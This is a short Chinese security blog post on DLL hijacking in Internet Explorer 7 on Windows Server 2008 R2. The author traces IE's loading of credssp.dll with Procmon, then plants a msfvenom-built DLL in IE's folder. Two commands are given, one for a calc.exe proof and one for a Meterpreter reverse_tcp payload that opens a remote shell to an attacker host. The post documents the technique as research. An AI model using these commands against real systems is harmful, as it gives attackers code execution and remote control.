IEdll hijacking

  1. 前言
  2. 正文

前言

今天下午原本是想复现这篇文章里面的UAC Bypass via SystemPropertiesAdvanced.exe and DLL Hijacking – egre55 – thoughts on security DLL劫持。没想到我在WIndows Server 2008 R2测试的时候发现IE的DLL劫持
2015071941728151.jpg

正文

环境:windows Server 2008 R2
IE版本:IE 7

kOTCcV.png

IE文件夹里面原来的样子:
kOTn91.png

先配置好Procmon
kOTagP.png

重启Procmon然后打开IE,找到credssp.dll
kOTLgx.md.png

当时我是抱着一试的心态,用msfvenom生成了个dll

msfvenom -p windows/exec CMD="calc.exe" -f dll > credssp.dll

然后放入到IE的文件夹里,然后重启IE
kO7F2t.md.png

测试结果:
kO7Na4.gif

再次用Procmon分析
发现注册表会找这个DLL,如果找到了就执行
kO74zt.md.png

credssp.dll成功被IE执行
kO7Oij.md.png

msfvenom生成反弹meterpreter的dll

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > credssp.dll

替换掉那个弹CALC的dll

kOHQTe.png

kOHt6P.gif

转载请声明:转自422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:IEdll hijacking

本文作者:九世

发布时间:2019-03-04, 16:58:57

最后更新:2019-04-19, 20:36:16

原始链接:http://jiushill.github.io/posts/c1ab089d.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录